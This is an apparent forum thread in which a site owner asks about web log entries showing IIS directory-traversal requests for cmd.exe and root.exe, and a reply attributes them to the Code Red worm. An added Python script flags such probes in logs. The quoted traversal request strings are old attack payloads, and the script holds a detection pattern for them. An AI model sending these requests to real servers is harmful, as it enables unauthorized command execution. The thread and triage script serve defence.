/scripts/..Áœ../winnt/system32/cmd.exe?/c+dir
/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c+dir
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
/d/winnt/system32/cmd.exe?/c+dir
/scripts/root.exe?/c+dir
/MSADC/root.exe?/c+dir
Is this someone trying to gain access to my system? What do they think they will see?
Jaeden
It is not any individual trying to hack your system. It looks like some variety of the "Code Red" worm, which infects and spreads from Microsoft IIS servers that haven't been properly patched.
The giveaway is the repeated snip of code:
winnt/system32/cmd.exe?/
The worm is trying to copy the standard Windows NT/2000 command interpreter "cmd.exe" into the server's "scripts" directory, so it can execute commands on the site.
If your site is not on a Microsoft server you are probably safe. Also, Microsoft offered a patch for this months ago. I would be extremely surprised if your host had this hole and hasn't patched it yet, but it wouldn't hurt to ask them about it.
As for the 404 codes -- the fact that you found the record of it under 404 means your server returned a "not found" message. IOW the worm was not getting what it wanted -- a good thing!
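The two checks described in the reply above (the `cmd.exe`/`root.exe` signature and the response status), written as a log triage script. This is an added example, not part of the original thread; the log lines are constructed in Common Log Format and the function names are hypothetical.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample lines (Common Log Format, documentation address ranges).
SAMPLE_LOG = """\
192.0.2.10 - - [18/Sep/2001:10:01:02 +0000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
192.0.2.10 - - [18/Sep/2001:10:01:03 +0000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
192.0.2.10 - - [18/Sep/2001:10:01:04 +0000] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290
198.51.100.7 - - [18/Sep/2001:10:05:00 +0000] "GET /index.html HTTP/1.0" 200 5120
203.0.113.5 - - [18/Sep/2001:10:09:41 +0000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 1834
"""

# client, method, request target, status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')
# The giveaway from the thread: a request for cmd.exe or root.exe.
PROBE_RE = re.compile(r'(?:^|[/\\])(?:cmd|root)\.exe(?:\?|$)', re.IGNORECASE)


def decode(target, rounds=3):
    """Percent-decode repeatedly so %5c and double-encoded forms are normalised."""
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def triage(log_text):
    """Group probe requests by client: 4xx means rejected, anything else needs review."""
    report = defaultdict(lambda: {"blocked": 0, "investigate": []})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, _method, target, status = m.groups()
        if not PROBE_RE.search(decode(target)):
            continue
        if status.startswith("4"):
            report[client]["blocked"] += 1
        else:
            report[client]["investigate"].append((status, target))
    return dict(report)


if __name__ == "__main__":
    for client, result in triage(SAMPLE_LOG).items():
        print(client, result)
```

A client with only `blocked` hits matches the situation in the thread; any entry under `investigate` means the server answered a probe with something other than an error and that host should be checked.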